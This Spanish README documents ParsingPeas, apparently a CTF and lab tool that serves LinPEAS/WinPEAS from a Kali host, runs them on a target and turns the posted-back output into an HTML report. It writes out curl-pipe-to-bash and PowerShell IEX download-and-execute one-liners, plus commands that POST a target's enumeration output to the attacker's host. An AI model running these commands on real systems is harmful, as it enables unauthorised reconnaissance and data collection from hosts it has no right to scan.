
Analizador HTML para la salida de PEAS con características adicionales
Recopilación automatizada de PEASS + un informe HTML limpio y portátil para trabajo de escalada de privilegios en CTF y laboratorios.
Ejecuta un solo comando en el objetivo. ParsingPeas obtiene LinPEAS/WinPEAS desde tu host Kali, ejecuta el escaneo, envía la salida de vuelta y la convierte en un único informe HTML autocontenido que puedes leer, buscar, clasificar y conservar — sin transferencia manual de archivos, sin internet en el objetivo.
Resumen del informe — secciones agrupadas por las propias categorías de LinPEAS, con puntos de hallazgos y una barra de hallazgos:

Solo hallazgos — un clic filtra el informe y la barra lateral para mostrar solo las secciones con resultados críticos/altos:

Salida completa del terminal — el escaneo completo, fielmente coloreado; se puede buscar con Ctrl-F:

La salida bruta de PEASS es un muro de texto de terminal que desaparece en cuanto tu shell muere. ParsingPeas:
scp, sin tener que alojar linpeas tú mismo, sin copiar y pegar la salida de vuelta a Kali..html autocontenido que puedes copiar fuera de la máquina, archivar o abrir sin conexión haciendo doble clic.Es presentación + logística, no un motor de explotación: conserva fielmente el coloreado y los hallazgos de PEASS en lugar de cuestionarlos.
file://.N críticos / N altos que saltan entre secciones marcadas, más una leyenda de colores.bash) y WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # descarga LinPEAS + WinPEAS en scripts/
pip3 install -r requirements.txt
python3 receiver.py # sirve en http://0.0.0.0:8005
Deja receiver.py en ejecución. Encuentra la IP a la que el objetivo te alcanzará:
tun0 — ip -4 addr show tun0Linux/Unix (usa curl, recurre a wget):
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash
Windows (PowerShell / reverse shell):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"
Elige la línea que coincida con el SO del objetivo — Linux sirve LinPEAS, Windows sirve WinPEAS.
Los informes se generan en tu host Kali en ./reports/. Puedes:
http://TU_IP_KALI:8005 y hacer clic en un informe, oxdg-open ./reports/report_<host>_<timestamp>.html
Copia ese único .html donde quieras; funciona por sí solo.
Objetivo → descarga envoltorio desde Kali → ejecuta PEASS → envía salida mediante POST → Kali analiza → informe HTML autocontenido
El objetivo nunca necesita internet — el envoltorio y los binarios de PEASS se sirven desde tu host.
Si la línea de un solo comando falla, hazlo manualmente.
Linux:
# En el objetivo
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Enviar de vuelta
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
Windows (PowerShell):
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
Analizar un volcado de PEASS que ya tengas:
python3 parser.py /path/to/peas_output.txt # escribe un informe HTML en ./reports/
Edita la parte superior de receiver.py:
curl http://KALI_IP:8005/health para comprobar la conectividad; abre el cortafuegos con sudo ufw allow 8005/tcp./get-linpeas? Ejecuta ./setup.sh para obtener los binarios de PEASS.⚠️ Solo para pruebas de penetración autorizadas, CTFs y uso en laboratorio.
Construido sobre PEASS-ng por @carlospolop. ParsingPeas solo recopila y presenta su salida.
Licencia MIT · Las contribuciones son bienvenidas
| Configuración | Valor por defecto | Notas |
|---|
| Puerto | 8005 | cambia la línea app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | escaneos subidos en bruto |
REPORTS_DIR | ./reports | informes HTML generados |
SCRIPTS_DIR | ./scripts | binarios de LinPEAS/WinPEAS |
MAX_UPLOAD_SIZE | 10 MB | aplicado — las subidas más grandes reciben HTTP 413 |